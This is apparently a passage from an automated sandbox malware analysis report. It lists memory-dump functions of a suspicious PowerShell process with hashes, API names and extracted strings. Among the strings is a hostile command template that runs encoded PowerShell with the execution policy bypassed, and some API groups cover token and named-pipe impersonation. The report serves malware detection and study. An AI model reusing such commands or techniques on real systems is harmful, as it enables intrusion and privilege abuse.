                                                    • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                                    • Instruction Fuzzy Hash: 8A21A12332064165FE15AFE5BBCC36D66609B88760F1B01289A150FFF2CE7C8881B355
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                    • String ID:
                                                    • API String ID: 4060740672-0
                                                    • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                    • Instruction ID: a1de30a9f8a26cd13b4eb83594b3cc92c6c5126487d02a7dae4f2a994434c533
                                                    • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                                                    • Instruction Fuzzy Hash: FC11592230868071FF31EFE59FBDBAC6610A7A1B60F1B4524D59907BC3C6FA8440A31C
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                    • String ID:
                                                    • API String ID: 4060740672-0
                                                    • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                    • Instruction ID: 1e022eec43365a84dafc436e4a5fe75cef15b94188db841e9664fe1580b8de20
                                                    • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                                    • Instruction Fuzzy Hash: 2711D3237102806AFF156FA5BA8D35C3A51AF88761F6B1624AD150FFF2CE7C8481A320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$malloc$_errno$_callnewh
                                                    • String ID:
                                                    • API String ID: 4160633307-0
                                                    • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                                    • Instruction ID: 72659dd0de3eb4987b4fe510d1a0713ab902633025b365e13c8208fa4ef68a15
                                                    • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                                    • Instruction Fuzzy Hash: BA71282230478466EF329FA695687AE7791F7A4BC8F064029DD8647F86EB38C445E708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                     • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                                    • String ID:
                                                    • API String ID: 3534990644-0
                                                    • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                    • Instruction ID: 87775b0fd298515e3e07855f3a3f9b85d3611fbf7d22b1f8a970de51a1170635
                                                    • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                                    • Instruction Fuzzy Hash: 5C7125223007C466EF209AA6B6687AE7791F78DBC8F024115DD468FFA6EB3DC505E700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                                                    • String ID: /'); %s
                                                    • API String ID: 1314452303-1283008465
                                                    • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                                    • Instruction ID: 83714c9e35bcb158ad9b8df8ca4f414ef135296f02d934a12a003b647fa048fd
                                                    • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                                    • Instruction Fuzzy Hash: 06C1C12160024162FF76FBE2967D7A92391EBA5780F534028ADD54BFC7DE38C846E708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                                                    • String ID: VUUU
                                                    • API String ID: 632458648-2040033107
                                                    • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                    • Instruction ID: e9f5f054d17b13a76e91c9c0cc10bf645e20ef4b47ab82f0f52074734a7c5b33
                                                    • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                    • Instruction Fuzzy Hash: 37A1F42670066066FF14EBE6EA593AD2291BB8D7C1F824025ED495FFF6DE3CC505A310
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf
                                                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                    • API String ID: 3512837008-1250630670
                                                    • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                    • Instruction ID: 2c3fe712bfefbce3c0b0fef6ce5f3d6611d96ed12f1da5acd5054f8fc42777ab
                                                    • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                    • Instruction Fuzzy Hash: FF818C32600B84A5EF25DFA5DAA83D937A0F7A4784F464126DA8D03B99DF38C545E708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                                    • String ID: %s as %s\%s: %d
                                                    • API String ID: 3435635427-816037529
                                                    • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                    • Instruction ID: 76c73ae3a1af3ec4d2e66ba9eac83a4d9e5f7ce08d6fdfa30b900a834352b0a9
                                                    • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                    • Instruction Fuzzy Hash: 40515932204B8196EA60DB56F99875AB7A5F789B80F054025EE898BF6ADF3CC055DB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                                    • String ID: mode
                                                    • API String ID: 1756087678-2976727214
                                                    • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                                    • Instruction ID: 16411d9630c4d4155a4210e0bd83e1825026cadf346ba391e05b58ef8e233970
                                                    • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                                    • Instruction Fuzzy Hash: 0141F621304240A2EF25EB92A63D3A97351F7E8BD0F528125AE9E07FD6DE3CC5419B08
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                    • String ID: /'); %s
                                                    • API String ID: 761449704-1283008465
                                                    • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                                    • Instruction ID: 877a307086af4afeed53347a6524cb185654bc7b9780a231ff635e72413e8f5e
                                                    • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                                    • Instruction Fuzzy Hash: 4031A11120028125EE3B9FA76E383A56B51B776FD0F4A8121DEE507FA6CB38C442B318
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$OpenProcessToken
                                                    • String ID:
                                                    • API String ID: 2009710997-0
                                                    • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                    • Instruction ID: 03d94992a3ae72ea466c6fb797f3e65b8eedb150cb5f60ac6967b8558da15d14
                                                    • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                    • Instruction Fuzzy Hash: 1F31B425704701A6FF149BE2F69875A67A1EB8CF90F164038AA458BFB6DE3CC445BB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2917016420-0
                                                    • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                    • Instruction ID: 2ebe1e40e5214eab50b005d072890bc01db234cda7c889dce1a58a24a82680c0
                                                    • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                    • Instruction Fuzzy Hash: C8312661700B00A2FF319FE69A2832D67D5EBA6B91F564224EE8947FD5DF3CC000A308
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3191669884-0
                                                    • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                    • Instruction ID: ce831bb16d0a7389648152f731d7bcc5e6e5ad9f6d6f072be8502b81ced21420
                                                    • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                    • Instruction Fuzzy Hash: 02318D72304784A5FE30DF969658B9DB6A4E764FE1F168121EA9403F85CB74C841A704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3191669884-0
                                                    • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                    • Instruction ID: 7343c49ab22b2b13b5b15b93ce993aac7d1db3bfbf63e65f01c1d23ab9afe405
                                                    • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                    • Instruction Fuzzy Hash: 08314F73304784A5EB209F91E68875DB6A4F74CBE4F569121AE580BFA5CF38C851E710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTickioctlsocket
                                                    • String ID:
                                                    • API String ID: 3686034022-0
                                                    • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                    • Instruction ID: 45c1ca25f4d7b135b49c5cc18677680f2384c90284a63fde4e6c49ca93117585
                                                    • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                    • Instruction Fuzzy Hash: A811C421200A8567FF108BE5F98C359A360E78CB64F520264DA498AFF0DFBCD889B710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                                                    • String ID:
                                                    • API String ID: 4232080776-0
                                                    • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                                    • Instruction ID: 858477b128a2e62099544fec214b1ff0ff885e2c951272a546a0fff84645afef
                                                    • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                                    • Instruction Fuzzy Hash: 59215E22610A46B5FF50DFA1FA8C76A2361F78CB44F86411698094EFB6DF2CC448F719
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                    • String ID:
                                                    • API String ID: 2328795619-0
                                                    • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                                    • Instruction ID: e0ea1f62ba13c7096fb9ca4677ecff570a969a08c26ef40074ce437bd764c3f9
                                                    • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                                    • Instruction Fuzzy Hash: BE515821705644B2FE39CAE75728B6A6680FB65FF4F164710AEB943FC5CB34C481AA48
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                    • String ID:
                                                    • API String ID: 2328795619-0
                                                    • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                    • Instruction ID: b00b72c391151923ef0566c4282dcf2a1cb6d156646da05541ba6b8c6bcc5063
                                                    • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                    • Instruction Fuzzy Hash: 51510523708250A6FE248EA677087697590B748BF8F164715AE3E4BFF9CF3CD491A244
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$freemalloc$_callnewh
                                                    • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                                                    • API String ID: 2029259483-317027030
                                                    • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                    • Instruction ID: 00142f7683465f5d0d4d930a9eff918b74e7ff4eafd750fc365b27d5ae084290
                                                    • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                    • Instruction Fuzzy Hash: EE61D131708750A6EF30DFA5E5692ADB7A1F3A4B80F414015EA8943F99EF78C505EB44
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 445582508-0
                                                    • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                    • Instruction ID: 884e473842cff5a4f725d7351be52e332e21c5968be0a32746cdc2ef803b1a1b
                                                    • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                    • Instruction Fuzzy Hash: FE51DF7362074092EF208F50E64836AB7A5F788B58F1A4525DA494BFF4DF7CC851E700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                                    • String ID:
                                                    • API String ID: 3587854850-0
                                                    • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                    • Instruction ID: 7b73c8daa62fdac81b29f6645bd09d28ebea348c28f69b66821d82f42bfce8f5
                                                    • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                    • Instruction Fuzzy Hash: 5741852231464062EE14EB92F6697AEA251BBCCBD0F428125AE5E4FFF6DE3CC505D700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                                    • String ID:
                                                    • API String ID: 3426420785-0
                                                    • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                    • Instruction ID: c729edeaff53e705cca544162a365f726524389a5a38e86db7e43de6e33e890a
                                                    • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                    • Instruction Fuzzy Hash: 32416D62710611B5FF10EBF1EA9D7D923A4AB9C794F424411EE098BFB6DE3CC50AA710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                                    • String ID:
                                                    • API String ID: 2310505145-0
